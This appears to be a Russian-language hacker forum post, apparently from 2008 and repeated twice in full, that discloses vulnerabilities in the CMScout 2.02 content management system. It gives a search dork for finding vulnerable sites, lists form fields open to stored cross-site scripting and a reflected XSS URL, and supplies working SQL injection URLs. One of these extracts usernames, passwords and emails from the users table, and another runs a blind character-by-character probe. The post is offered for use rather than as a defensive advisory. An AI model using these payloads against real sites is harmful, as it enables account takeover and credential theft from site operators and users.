ZAMUT
03.03.2008, 04:29
CMScout
Site: http://cmscout.co.za
Version: 2.02
Dork: "Powered by CMScout"
Active XSS:
CMScout 2.02 forums >> Test Forum >> New Topic
Уязвимые поля: "Subject", "Description"
User Control Panel >> Profile
Уязвимые поля: "First Name", "Last Name", "Contributions"
CMScout Administration
Download Manager
Уязвимые поля: "Name"
Photo Album Manager
Уязвимые поля: "Name"
Passive XSS
/index.php?page=forums&f=1&menuid=3[xss]
Remote SQL Injection:
/admin.php?page=users&subpage=users_view&id=-1+union+select+1,2,concat_ws(0x3a,uname,passwd,ema il),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40+from+cms_users/*
Нету вывода - забираем данные посимвольно.
/admin.php?page=group&action=auth&id=1+and+substring(version(),1,1)=5/*
Чтобы узнать полный путь к сайту, можно, как вариант посмотреть логи:
CMScout Administration >> Logfile viewer
(с) ZAMUT
Site: http://cmscout.co.za
Version: 2.02
Dork: "Powered by CMScout"
Active XSS:
CMScout 2.02 forums >> Test Forum >> New Topic
Уязвимые поля: "Subject", "Description"
User Control Panel >> Profile
Уязвимые поля: "First Name", "Last Name", "Contributions"
CMScout Administration
Download Manager
Уязвимые поля: "Name"
Photo Album Manager
Уязвимые поля: "Name"
Passive XSS
/index.php?page=forums&f=1&menuid=3[xss]
Remote SQL Injection:
/admin.php?page=users&subpage=users_view&id=-1+union+select+1,2,concat_ws(0x3a,uname,passwd,ema il),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40+from+cms_users/*
Нету вывода - забираем данные посимвольно.
/admin.php?page=group&action=auth&id=1+and+substring(version(),1,1)=5/*
Чтобы узнать полный путь к сайту, можно, как вариант посмотреть логи:
CMScout Administration >> Logfile viewer
(с) ZAMUT